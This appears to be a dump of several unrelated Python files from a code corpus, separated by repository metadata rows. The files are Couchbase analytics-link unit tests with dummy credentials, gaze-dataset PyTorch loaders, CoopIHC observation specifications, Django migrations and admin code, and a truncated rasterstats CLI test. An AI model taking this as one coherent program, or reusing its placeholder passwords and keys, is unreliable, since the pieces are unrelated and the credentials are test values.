        """Creating the same link twice raises AnalyticsLinkExistsException."""
        dataverse_name = "test_dataverse"
        self.mgr.create_dataverse(
            dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
        link = S3ExternalAnalyticsLink(dataverse_name,
                                       "s3link",
                                       "accesskey",
                                       "us-west-2",
                                       secret_access_key="mysupersecretkey",
                                       )
        self.mgr.create_link(link)
        with self.assertRaises(AnalyticsLinkExistsException):
            self.mgr.create_link(link)
        self.mgr.drop_link("s3link", dataverse_name)
        self.mgr.drop_dataverse(
            dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
    def test_link_fail_dataverse_not_found(self):
        """create/replace/drop on a missing dataverse raise, for all link types."""
        dataverse_name = "test_dataverse"
        self.mgr.create_dataverse(
            dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
        link = S3ExternalAnalyticsLink("notadataverse",
                                       "s3link",
                                       "accesskey",
                                       "us-west-2",
                                       secret_access_key="mysupersecretkey",
                                       )
        with self.assertRaises(DataverseNotFoundException):
            self.mgr.create_link(link)
        with self.assertRaises(DataverseNotFoundException):
            self.mgr.replace_link(link)
        with self.assertRaises(DataverseNotFoundException):
            self.mgr.drop_link(link.name(), link.dataverse_name())
        link = CouchbaseRemoteAnalyticsLink("notadataverse",
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.NONE),
                                            username="Administrator",
                                            password="password")
        with self.assertRaises(DataverseNotFoundException):
            self.mgr.create_link(link)
        with self.assertRaises(DataverseNotFoundException):
            self.mgr.replace_link(link)
        with self.assertRaises(DataverseNotFoundException):
            self.mgr.drop_link(link.name(), link.dataverse_name())
        link = AzureBlobExternalAnalyticsLink("notadataverse",
                                              "azurebloblink",
                                              account_name="myaccount",
                                              account_key="myaccountkey")
        with self.assertRaises(DataverseNotFoundException):
            self.mgr.create_link(link)
        with self.assertRaises(DataverseNotFoundException):
            self.mgr.replace_link(link)
        with self.assertRaises(DataverseNotFoundException):
            self.mgr.drop_link(link.name(), link.dataverse_name())
        self.mgr.drop_dataverse(
            dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
    def test_create_couchbase_link_fail_invalid_argument(self):
        """Each required field missing/empty must raise InvalidArgumentException."""
        dataverse_name = "test_dataverse"
        self.mgr.create_dataverse(
            dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
        # empty dataverse name
        link = CouchbaseRemoteAnalyticsLink("",
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.NONE),
                                            username="Administrator",
                                            password="password")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # empty link name
        link = CouchbaseRemoteAnalyticsLink(dataverse_name,
                                            "",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.NONE),
                                            username="Administrator",
                                            password="password")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # empty hostname
        link = CouchbaseRemoteAnalyticsLink(dataverse_name,
                                            "cbremote",
                                            "",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.NONE),
                                            username="Administrator",
                                            password="password")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # NONE encryption requires a username
        link = CouchbaseRemoteAnalyticsLink(dataverse_name,
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.NONE),
                                            password="password")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # NONE encryption requires a password
        link = CouchbaseRemoteAnalyticsLink(dataverse_name,
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.NONE),
                                            username="Administrator")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # HALF encryption requires a username
        link = CouchbaseRemoteAnalyticsLink(dataverse_name,
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.HALF),
                                            password="password")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # HALF encryption requires a password
        link = CouchbaseRemoteAnalyticsLink(dataverse_name,
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.HALF),
                                            username="Administrator")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # FULL encryption requires a certificate
        link = CouchbaseRemoteAnalyticsLink(dataverse_name,
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.FULL)
                                            )
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # FULL encryption with certificate only: still missing client creds
        link = CouchbaseRemoteAnalyticsLink(dataverse_name,
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.FULL,
                                                certificate=bytes('certificate', 'utf-8'))
                                            )
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # client certificate without client key
        link = CouchbaseRemoteAnalyticsLink(dataverse_name,
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.FULL,
                                                certificate=bytes(
                                                    'certificate', 'utf-8'),
                                                client_certificate=bytes('clientcert', 'utf-8'))
                                            )
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # client key without client certificate
        link = CouchbaseRemoteAnalyticsLink(dataverse_name,
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.FULL,
                                                certificate=bytes(
                                                    'certificate', 'utf-8'),
                                                client_key=bytes('clientkey', 'utf-8'))
                                            )
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        self.mgr.drop_dataverse(
            dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
    def test_create_s3_link_fail_invalid_argument(self):
        """Empty dataverse/name/access-key/region/secret must each raise."""
        dataverse_name = "test_dataverse"
        self.mgr.create_dataverse(
            dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
        # empty dataverse name
        link = S3ExternalAnalyticsLink("",
                                       "s3link",
                                       "accesskey",
                                       "us-west-2",
                                       secret_access_key="mysupersecretkey",
                                       )
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # empty link name
        link = S3ExternalAnalyticsLink(dataverse_name,
                                       "",
                                       "accesskey",
                                       "us-west-2",
                                       secret_access_key="mysupersecretkey",
                                       )
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # empty access key id
        link = S3ExternalAnalyticsLink(dataverse_name,
                                       "s3link",
                                       "",
                                       "us-west-2",
                                       secret_access_key="mysupersecretkey",
                                       )
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # empty region
        link = S3ExternalAnalyticsLink(dataverse_name,
                                       "s3link",
                                       "accesskey",
                                       "",
                                       secret_access_key="mysupersecretkey",
                                       )
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # missing secret access key
        link = S3ExternalAnalyticsLink("",
                                       "s3link",
                                       "accesskey",
                                       "us-west-2",
                                       )
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        self.mgr.drop_dataverse(
            dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
    def test_create_azureblob_link_fail_invalid_argument(self):
        """Azure blob links need a name, dataverse, and a complete credential set."""
        dataverse_name = "test_dataverse"
        self.mgr.create_dataverse(
            dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
        # empty dataverse name
        link = AzureBlobExternalAnalyticsLink("",
                                              "azurebloblink",
                                              account_name="myaccount",
                                              account_key="myaccountkey")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # empty link name
        link = AzureBlobExternalAnalyticsLink(dataverse_name,
                                              "",
                                              account_name="myaccount",
                                              account_key="myaccountkey")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # no credentials at all
        link = AzureBlobExternalAnalyticsLink(dataverse_name,
                                              "azurebloblink")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # account name without key
        link = AzureBlobExternalAnalyticsLink(dataverse_name,
                                              "azurebloblink",
                                              account_name="myaccount")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # account key without name
        link = AzureBlobExternalAnalyticsLink(dataverse_name,
                                              "azurebloblink",
                                              account_key="myaccountkey")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        # SAS alone is insufficient
        link = AzureBlobExternalAnalyticsLink(dataverse_name,
                                              "azurebloblink",
                                              shared_access_signature="sharedaccesssignature")
        with self.assertRaises(InvalidArgumentException):
            self.mgr.create_link(link)
        self.mgr.drop_dataverse(
            dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
    def test_link_fail_link_not_found(self):
        """replace/drop of a never-created link raise, for all link types."""
        dataverse_name = "test_dataverse"
        self.mgr.create_dataverse(
            dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
        link = S3ExternalAnalyticsLink(dataverse_name,
                                       "notalink",
                                       "accesskey",
                                       "us-west-2",
                                       secret_access_key="mysupersecretkey",
                                       )
        with self.assertRaises(AnalyticsLinkNotFoundException):
            self.mgr.replace_link(link)
        with self.assertRaises(AnalyticsLinkNotFoundException):
            self.mgr.drop_link(link.name(), link.dataverse_name())
        link = CouchbaseRemoteAnalyticsLink(dataverse_name,
                                            "cbremote",
                                            "localhost",
                                            CouchbaseAnalyticsEncryptionSettings(
                                                AnalyticsEncryptionLevel.NONE),
                                            username="Administrator",
                                            password="password")
        with self.assertRaises(AnalyticsLinkNotFoundException):
            self.mgr.replace_link(link)
        with self.assertRaises(AnalyticsLinkNotFoundException):
            self.mgr.drop_link(link.name(), link.dataverse_name())
        link = AzureBlobExternalAnalyticsLink(dataverse_name,
                                              "azurebloblink",
                                              account_name="myaccount",
                                              account_key="myaccountkey")
        with self.assertRaises(AnalyticsLinkNotFoundException):
            self.mgr.replace_link(link)
        with self.assertRaises(AnalyticsLinkNotFoundException):
            self.mgr.drop_link(link.name(), link.dataverse_name())
        self.mgr.drop_dataverse(
            dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
    def test_get_links_fail(self):
        """get_links: unknown dataverse raises; name without dataverse is invalid."""
        with self.assertRaises(DataverseNotFoundException):
            self.mgr.get_links(GetLinksAnalyticsOptions(
                dataverse_name="notadataverse"))
        with self.assertRaises(InvalidArgumentException):
            self.mgr.get_links(GetLinksAnalyticsOptions(name="mylink"))
| 46.449292
| 125
| 0.529031
| 3,120
| 39,389
| 6.455769
| 0.101923
| 0.091649
| 0.033562
| 0.026164
| 0.816801
| 0.800963
| 0.78587
| 0.769586
| 0.744266
| 0.731606
| 0
| 0.007783
| 0.393282
| 39,389
| 847
| 126
| 46.504132
| 0.835049
| 0.031557
| 0
| 0.74584
| 0
| 0
| 0.075304
| 0.002283
| 0
| 0
| 0
| 0
| 0.122542
| 1
| 0.043873
| false
| 0.018154
| 0.01059
| 0
| 0.06354
| 0.016641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d4e022331f78c0457a6bc113e4039ef90bf7aa5
| 4,994
|
py
|
Python
|
datasets.py
|
Ahmednull/L2S-Net
|
bf6a1c443de65a7c9b25becfd6ddea4445714c6c
|
[
"MIT"
] | 21
|
2022-03-07T20:29:50.000Z
|
2022-03-25T09:25:32.000Z
|
datasets.py
|
Ahmednull/L2S-Net
|
bf6a1c443de65a7c9b25becfd6ddea4445714c6c
|
[
"MIT"
] | 3
|
2022-03-21T14:13:25.000Z
|
2022-03-31T01:34:46.000Z
|
datasets.py
|
Ahmednull/L2S-Net
|
bf6a1c443de65a7c9b25becfd6ddea4445714c6c
|
[
"MIT"
] | 4
|
2022-02-24T13:13:52.000Z
|
2022-03-22T06:23:14.000Z
|
import os
import numpy as np
import cv2
import torch
from torch.utils.data.dataset import Dataset
from torchvision import transforms
from PIL import Image, ImageFilter
class Gaze360(Dataset):
    """Gaze360 dataset reader.

    Loads annotation lines from one or more label files (first line of
    each file is a header and is dropped) and serves face crops with
    binned and continuous (pitch, yaw) gaze labels in degrees.
    """
    def __init__(self, path, root, transform, angle, binwidth, train=True):
        """Read annotation file(s) and keep lines whose gaze is within +/- angle deg.

        path: a single label-file path, or a list of paths.
        root: directory that image paths in the label file are relative to.
        angle: max |pitch| and |yaw| (degrees) kept when train=True;
               widened to 90 for evaluation.
        binwidth: width (degrees) of each classification bin.
        """
        self.transform = transform
        self.root = root
        self.orig_list_len = 0
        self.angle = angle
        if train==False:
            angle=90
        self.binwidth=binwidth
        self.lines = []
        # NOTE(review): the list branch neither updates orig_list_len nor
        # applies the angle filter -- inconsistent with the single-path
        # branch below; confirm whether that is intentional.
        if isinstance(path, list):
            for i in path:
                with open(i) as f:
                    print("here")
                    line = f.readlines()
                    line.pop(0)
                    self.lines.extend(line)
        else:
            with open(path) as f:
                lines = f.readlines()
                lines.pop(0)
                self.orig_list_len = len(lines)
                for line in lines:
                    # field 5 holds the 2D gaze "pitch,yaw" in radians
                    gaze2d = line.strip().split(" ")[5]
                    label = np.array(gaze2d.split(",")).astype("float")
                    # keep only samples within +/- angle degrees on both axes
                    if abs((label[0]*180/np.pi)) <= angle and abs((label[1]*180/np.pi)) <= angle:
                        self.lines.append(line)
        print("{} items removed from dataset that have an angle > {}".format(self.orig_list_len-len(self.lines), angle))
    def __len__(self):
        """Number of retained annotation lines."""
        return len(self.lines)
    def __getitem__(self, idx):
        """Return (image, binned_labels, continuous_labels, name) for sample idx."""
        line = self.lines[idx]
        line = line.strip().split(" ")
        # annotation layout (by index): 0 face crop path, 1 left eye,
        # 2 right eye, 3 sample name, 5 gaze "pitch,yaw" in radians
        face = line[0]
        lefteye = line[1]
        righteye = line[2]
        name = line[3]
        gaze2d = line[5]
        label = np.array(gaze2d.split(",")).astype("float")
        label = torch.from_numpy(label).type(torch.FloatTensor)
        # radians -> degrees
        pitch = label[0]* 180 / np.pi
        yaw = label[1]* 180 / np.pi
        img = Image.open(os.path.join(self.root, face))
        # fimg = cv2.imread(os.path.join(self.root, face))
        # fimg = cv2.resize(fimg, (448, 448))/255.0
        # fimg = fimg.transpose(2, 0, 1)
        # img=torch.from_numpy(fimg).type(torch.FloatTensor)
        if self.transform:
            img = self.transform(img)
        # Bin values
        bins = np.array(range(-1*self.angle, self.angle, self.binwidth))
        binned_pose = np.digitize([pitch, yaw], bins) - 1
        labels = binned_pose
        cont_labels = torch.FloatTensor([pitch, yaw])
        return img, labels, cont_labels, name
class Mpiigaze(Dataset):
    """MPIIGaze dataset with leave-one-fold-out splitting.

    ``pathorg`` is a list of per-fold annotation files.  Training uses every
    fold except ``fold``; evaluation uses only ``pathorg[fold]``.  Each
    annotation line is whitespace-separated: face path in column 0, sample
    name in column 3, and ``"pitch,yaw"`` gaze (radians) in column 7.
    """

    def __init__(self, pathorg, root, transform, train, angle, fold=0):
        self.transform = transform
        self.root = root
        self.orig_list_len = 0
        self.lines = []
        selected = pathorg.copy()
        if train == True:
            # Drop the held-out fold; the remaining list is the train split.
            selected.pop(fold)
        else:
            # Evaluation uses just the held-out fold (a single path string).
            selected = selected[fold]
        if isinstance(selected, list):
            for annotation_file in selected:
                with open(annotation_file) as handle:
                    records = handle.readlines()
                records.pop(0)  # header row
                self.orig_list_len += len(records)
                for record in records:
                    pitch_yaw = np.array(
                        record.strip().split(" ")[7].split(",")).astype("float")
                    if (abs(pitch_yaw[0] * 180 / np.pi) <= angle
                            and abs(pitch_yaw[1] * 180 / np.pi) <= angle):
                        self.lines.append(record)
        else:
            with open(selected) as handle:
                records = handle.readlines()
            records.pop(0)  # header row
            self.orig_list_len += len(records)
            for record in records:
                pitch_yaw = np.array(
                    record.strip().split(" ")[7].split(",")).astype("float")
                # NOTE(review): the evaluation branch keeps the original
                # hard-coded 42-degree cutoff rather than ``angle`` —
                # preserved verbatim; confirm with the authors if intended.
                if (abs(pitch_yaw[0] * 180 / np.pi) <= 42
                        and abs(pitch_yaw[1] * 180 / np.pi) <= 42):
                    self.lines.append(record)
        print("{} items removed from dataset that have an angle > {}".format(
            self.orig_list_len - len(self.lines), angle))

    def __len__(self):
        return len(self.lines)

    def __getitem__(self, idx):
        """Return (image, binned labels, continuous labels in degrees, name)."""
        fields = self.lines[idx].strip().split(" ")
        face = fields[0]
        name = fields[3]
        gaze = torch.from_numpy(
            np.array(fields[7].split(",")).astype("float")).type(torch.FloatTensor)
        # Radians -> degrees.
        pitch = gaze[0] * 180 / np.pi
        yaw = gaze[1] * 180 / np.pi
        img = Image.open(os.path.join(self.root, face))
        if self.transform:
            img = self.transform(img)
        # Fixed 3-degree-wide bins spanning [-42, 42).
        bins = np.array(range(-42, 42, 3))
        labels = np.digitize([pitch, yaw], bins) - 1
        cont_labels = torch.FloatTensor([pitch, yaw])
        return img, labels, cont_labels, name
| 31.607595
| 121
| 0.524029
| 619
| 4,994
| 4.147011
| 0.174475
| 0.042072
| 0.027269
| 0.040904
| 0.802104
| 0.7873
| 0.767822
| 0.760421
| 0.759642
| 0.759642
| 0
| 0.036563
| 0.342811
| 4,994
| 157
| 122
| 31.808917
| 0.745582
| 0.073488
| 0
| 0.725664
| 0
| 0
| 0.032533
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053097
| false
| 0
| 0.061947
| 0.017699
| 0.168142
| 0.026549
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b4d6aa934c49af912d6fb270aed6bb097aa45408
| 100
|
py
|
Python
|
pygr/apps/__init__.py
|
Open-Technology/Graph-Database
|
0b5bd2414b888c4709af3390f9d41dc8e0d4a863
|
[
"BSD-3-Clause"
] | 30
|
2015-02-24T12:47:10.000Z
|
2022-02-02T10:41:54.000Z
|
pygr/apps/__init__.py
|
Open-Technology/Graph-Database
|
0b5bd2414b888c4709af3390f9d41dc8e0d4a863
|
[
"BSD-3-Clause"
] | 4
|
2015-08-08T07:30:35.000Z
|
2021-11-18T18:50:01.000Z
|
pygr/apps/__init__.py
|
Open-Technology/Graph-Database
|
0b5bd2414b888c4709af3390f9d41dc8e0d4a863
|
[
"BSD-3-Clause"
] | 14
|
2015-02-12T02:55:45.000Z
|
2021-11-24T19:43:40.000Z
|
from pygr.apps.leelabdb import *
from pygr.apps.seqref import *
from pygr.apps.splicegraph import *
| 25
| 35
| 0.79
| 15
| 100
| 5.266667
| 0.466667
| 0.303797
| 0.455696
| 0.455696
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 100
| 3
| 36
| 33.333333
| 0.897727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
2597c27f4455e012b6d6cc94b8d72bdf6cf9605c
| 1,129
|
py
|
Python
|
coopihc/observation/utils.py
|
jgori-ouistiti/CoopIHC
|
0fe24c618a430517c1394625275faff3ce344f7f
|
[
"MIT"
] | null | null | null |
coopihc/observation/utils.py
|
jgori-ouistiti/CoopIHC
|
0fe24c618a430517c1394625275faff3ce344f7f
|
[
"MIT"
] | 52
|
2021-11-23T13:49:50.000Z
|
2022-03-15T12:28:18.000Z
|
coopihc/observation/utils.py
|
jgori-ouistiti/CoopIHC
|
0fe24c618a430517c1394625275faff3ce344f7f
|
[
"MIT"
] | 1
|
2022-03-08T11:10:24.000Z
|
2022-03-08T11:10:24.000Z
|
import numpy
# ========================== Some observation engine specifications
# Each specification pairs a game-state substate name with what the
# observation engine may see of it: "all" exposes the whole substate,
# None hides it entirely.  All specifications always expose "game_info"
# and both agents' actions; they differ only in which states are visible.

# Oracle: sees every substate (full observability).
oracle_engine_specification = [
    ("game_info", "all"),
    ("task_state", "all"),
    ("user_state", "all"),
    ("assistant_state", "all"),
    ("user_action", "all"),
    ("assistant_action", "all"),
]

# Blind: sees no task/user/assistant state, only game info and actions.
blind_engine_specification = [
    ("game_info", "all"),
    ("task_state", None),
    ("user_state", None),
    ("assistant_state", None),
    ("user_action", "all"),
    ("assistant_action", "all"),
]

# Task: sees the task state but neither agent's internal state.
base_task_engine_specification = [
    ("game_info", "all"),
    ("task_state", "all"),
    ("user_state", None),
    ("assistant_state", None),
    ("user_action", "all"),
    ("assistant_action", "all"),
]

# User: sees the task state and its own (user) state, not the assistant's.
base_user_engine_specification = [
    ("game_info", "all"),
    ("task_state", "all"),
    ("user_state", "all"),
    ("assistant_state", None),
    ("user_action", "all"),
    ("assistant_action", "all"),
]

# Assistant: sees the task state and its own (assistant) state, not the user's.
base_assistant_engine_specification = [
    ("game_info", "all"),
    ("task_state", "all"),
    ("user_state", None),
    ("assistant_state", "all"),
    ("user_action", "all"),
    ("assistant_action", "all"),
]
| 22.58
| 67
| 0.572188
| 114
| 1,129
| 5.289474
| 0.166667
| 0.149254
| 0.119403
| 0.223881
| 0.870647
| 0.870647
| 0.870647
| 0.80597
| 0.80597
| 0.693201
| 0
| 0
| 0.190434
| 1,129
| 49
| 68
| 23.040816
| 0.659737
| 0.057573
| 0
| 0.707317
| 0
| 0
| 0.399247
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02439
| 0
| 0.02439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
25e69bac250de1a93790f1d8ecc57ccbc0ccdfd0
| 1,666
|
py
|
Python
|
hs_access_control/migrations/0011_auto_rename_new_fields_to_original_names.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 1
|
2018-09-17T13:07:29.000Z
|
2018-09-17T13:07:29.000Z
|
hs_access_control/migrations/0011_auto_rename_new_fields_to_original_names.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 100
|
2017-08-01T23:48:04.000Z
|
2018-04-03T13:17:27.000Z
|
hs_access_control/migrations/0011_auto_rename_new_fields_to_original_names.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 2
|
2017-07-27T20:41:33.000Z
|
2017-07-27T22:40:57.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Rename the temporary ``*new`` privilege fields back to their
    original names on all three privilege models."""

    dependencies = [
        ('hs_access_control', '0010_auto_rename_related_names'),
    ]

    # Each listed field currently carries a "new" suffix from the previous
    # migration step; strip it (e.g. "grantornew" -> "grantor").  The
    # comprehension emits the RenameField operations in the same order as
    # the original hand-written list.
    operations = [
        migrations.RenameField(
            model_name=model,
            old_name=field + 'new',
            new_name=field,
        )
        for model, fields in [
            ('groupresourceprivilege', ('grantor', 'group', 'resource')),
            ('usergroupprivilege', ('grantor', 'group', 'user')),
            ('userresourceprivilege', ('grantor', 'resource', 'user')),
        ]
        for field in fields
    ]
| 27.766667
| 64
| 0.555222
| 127
| 1,666
| 6.984252
| 0.314961
| 0.213078
| 0.263811
| 0.304397
| 0.807215
| 0.807215
| 0.766629
| 0.476888
| 0.476888
| 0.476888
| 0
| 0.004554
| 0.340936
| 1,666
| 59
| 65
| 28.237288
| 0.803279
| 0.012605
| 0
| 0.849057
| 0
| 0
| 0.223372
| 0.096774
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037736
| 0
| 0.09434
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d30db6a05629b4f15882a45fcc293e23dfc82f0e
| 125
|
py
|
Python
|
chatrooms/admin.py
|
dsingh12345/chatapp
|
94e0d0f3f2fb58699033f578b9beaa733a10632d
|
[
"MIT"
] | null | null | null |
chatrooms/admin.py
|
dsingh12345/chatapp
|
94e0d0f3f2fb58699033f578b9beaa733a10632d
|
[
"MIT"
] | null | null | null |
chatrooms/admin.py
|
dsingh12345/chatapp
|
94e0d0f3f2fb58699033f578b9beaa733a10632d
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Chat, ChatRoom
# Expose the chat models on the default Django admin site with the
# stock ModelAdmin (no custom admin options).
admin.site.register(ChatRoom)
admin.site.register(Chat)
| 20.833333
| 34
| 0.816
| 18
| 125
| 5.666667
| 0.555556
| 0.254902
| 0.333333
| 0.490196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096
| 125
| 5
| 35
| 25
| 0.902655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d315c90deb52198b4a6b69972d25184a55115316
| 2,133
|
py
|
Python
|
joblicant/JoblicantApp/migrations/0003_auto_20210705_1206.py
|
juliuscecilia33/joblicant
|
b654bc438838f633556cef16fa7e5bfa63eecfb6
|
[
"MIT"
] | null | null | null |
joblicant/JoblicantApp/migrations/0003_auto_20210705_1206.py
|
juliuscecilia33/joblicant
|
b654bc438838f633556cef16fa7e5bfa63eecfb6
|
[
"MIT"
] | null | null | null |
joblicant/JoblicantApp/migrations/0003_auto_20210705_1206.py
|
juliuscecilia33/joblicant
|
b654bc438838f633556cef16fa7e5bfa63eecfb6
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.4 on 2021-07-05 19:06
from django.db import migrations, models
class Migration(migrations.Migration):
    """Relax every CommonInformation field to allow blank/null values."""

    dependencies = [
        ('JoblicantApp', '0002_auto_20210705_1204'),
    ]

    # All ten fields become optional (blank=True, null=True).  Phone is an
    # IntegerField; every other field is a 100-character CharField.  The
    # comprehension preserves the original operation order.
    operations = [
        migrations.AlterField(
            model_name='commoninformation',
            name=field_name,
            field=(models.IntegerField(blank=True, null=True)
                   if field_name == 'Phone'
                   else models.CharField(blank=True, max_length=100, null=True)),
        )
        for field_name in [
            'CurrentCompany', 'Email', 'FullName', 'Github', 'LinkedIn',
            'OtherWebsite', 'Phone', 'Portfolio', 'ResumeFileName', 'Twitter',
        ]
    ]
| 33.328125
| 74
| 0.584154
| 196
| 2,133
| 6.244898
| 0.25
| 0.163399
| 0.204248
| 0.236928
| 0.775327
| 0.775327
| 0.734477
| 0.734477
| 0.687092
| 0.687092
| 0
| 0.038926
| 0.301453
| 2,133
| 63
| 75
| 33.857143
| 0.78255
| 0.021097
| 0
| 0.684211
| 1
| 0
| 0.14046
| 0.011026
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.070175
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d323eba25cc7419247463057abc2693a4bed0de6
| 5,523
|
py
|
Python
|
tests/test_cli.py
|
brendancol/python-raster-stats
|
6bdb524aa1471a719ba3ee6491786d2ac5c8a7ab
|
[
"BSD-3-Clause"
] | 1
|
2017-08-12T22:01:03.000Z
|
2017-08-12T22:01:03.000Z
|
tests/test_cli.py
|
brendancol/python-raster-stats
|
6bdb524aa1471a719ba3ee6491786d2ac5c8a7ab
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_cli.py
|
brendancol/python-raster-stats
|
6bdb524aa1471a719ba3ee6491786d2ac5c8a7ab
|
[
"BSD-3-Clause"
] | null | null | null |
import os.path
import json
import warnings
# Some warnings must be ignored to parse output properly
# https://github.com/pallets/click/issues/371#issuecomment-223790894
from click.testing import CliRunner
from rasterstats.cli import zonalstats, pointquery
def test_cli_feature():
